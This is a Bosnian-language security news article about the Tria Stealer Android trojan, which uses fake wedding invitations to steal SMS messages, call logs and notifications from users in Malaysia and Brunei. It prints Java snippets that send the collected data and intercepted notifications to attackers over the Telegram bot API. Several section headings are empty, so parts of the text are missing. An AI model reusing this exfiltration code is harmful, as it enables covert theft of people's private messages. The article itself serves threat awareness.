Site icon Kiber.ba

Trojanac Tria Stealer iskorištava Android telefone za eksfiltriranje SMS poruka

Trojanac Tria Stealer iskorištava Android telefone za eksfiltriranje SMS poruka-Kiber.ba

Trojanac Tria Stealer iskorištava Android telefone za eksfiltriranje SMS poruka-Kiber.ba

Novootkrivena kampanja malicioznog softvera za Android, nazvana Tria Stealer, cilja na korisnike u Maleziji i Bruneju od sredine 2024. godine.

Koristeći lažne pozivnice za vjenčanje kao mamac, ovaj trojanac krade osjetljive podatke, uključujući SMS poruke, evidencije poziva i obavještenja aplikacija, i eksfiltrira ih napadačima putem Telegram botova.

Kampanja je izazvala značajnu zabrinutost za sajber sigurnost zbog svojih sofisticiranih tehnika i taktika socijalnog inženjeringa.

Analitičari kibernetičke sigurnosti u Kaspersky Labs-u otkrili su da se maliciozni softver distribuiše kao APK datoteka putem ličnih i grupnih razgovora na WhatsApp-u i Telegramu.

Isporuka preko narušenog WhatsApp naloga (na levoj strani) i preko narušenog Telegram naloga (desno) (Izvor – Securelist)

Kako Tria Stealer radi

Žrtve su prevarene da preuzmu aplikaciju pod krinkom gledanja digitalne pozivnice za vjenčanje.

Nakon instalacije, maliciozni softver traži dozvole kao što su android.permission.RECEIVE_SMSandroid.permission.READ_CALL_LOG, i android.permission.BIND_NOTIFICATION_LISTENER_SERVICE, dajući mu pristup SMS porukama, evidencijama poziva i obavještenjima aplikacija.

Jednom instalirana, aplikacija se maskira kao aplikacija za sistemska podešavanja koristeći ikonu zupčanika kako bi izgledala legitimno.

Tokom svog prvog izvršenja, prikuplja informacije o uređaju (kao što su marka i model) i broj telefona žrtve.

Pregled kampanje Tria Stealer (Izvor – Securelist)

Ovi podaci se sklapaju u niz i šalju na server za upravljanje i upravljanje (C2) putem Telegram API poziva.

HttpURLConnection httpURLConnection = (HttpURLConnection) new URL(
"https://api.telegram.org/bot<bot_token>/sendMessage").openConnection();
httpURLConnection.setRequestMethod("POST");
httpURLConnection.setDoOutput(true);
byte[] bytes = ("chat_id=<chat_id>&text=" + collectedData).getBytes(StandardCharsets.UTF_8);
DataOutputStream dataOutputStream = new DataOutputStream(httpURLConnection.getOutputStream());
dataOutputStream.write(bytes);
dataOutputStream.close();

Ključne karakteristike Tria stealer-a uključuju:-

1. SMS i praćenje poziva :

2. Presretanje obavještenja :

    @Override
    public final void onNotificationPosted(StatusBarNotification statusBarNotification) {
        String packageName = statusBarNotification.getPackageName();
        String notificationContent = statusBarNotification.getNotification().extras.getString("android.text");
        sendToTelegram("App: " + packageName + "\nContent: " + notificationContent);
    }

    3. Otmica računa :

      4. Krađa podataka specifična za aplikaciju :

        Indikatori kompromisa

        Da biste se zaštitili od Tria Stealer-a, izbjegavajte instaliranje APK-ova iz nepouzdanih izvora i koristite pouzdana mobilna sigurnosna rješenja koja mogu otkriti prijetnje poput HEUR:Trojan-Spy.AndroidOS.Agent.*.

        Osim toga, redovno ažuriranje softvera uređaja pomaže u zakrpanju ranjivosti i poboljšava sigurnost .

        Iskorištavanjem taktike društvenog inženjeringa i korištenjem Telegrama za C2 komunikaciju, on predstavlja značajnu prijetnju privatnosti i sigurnosti korisnika.

        Korisnici u Maleziji i Bruneju ostaju primarne mete, ali globalna Android zajednica mora ostati na oprezu protiv takvih napada.

        Izvor: CyberSecurityNews

        Exit mobile version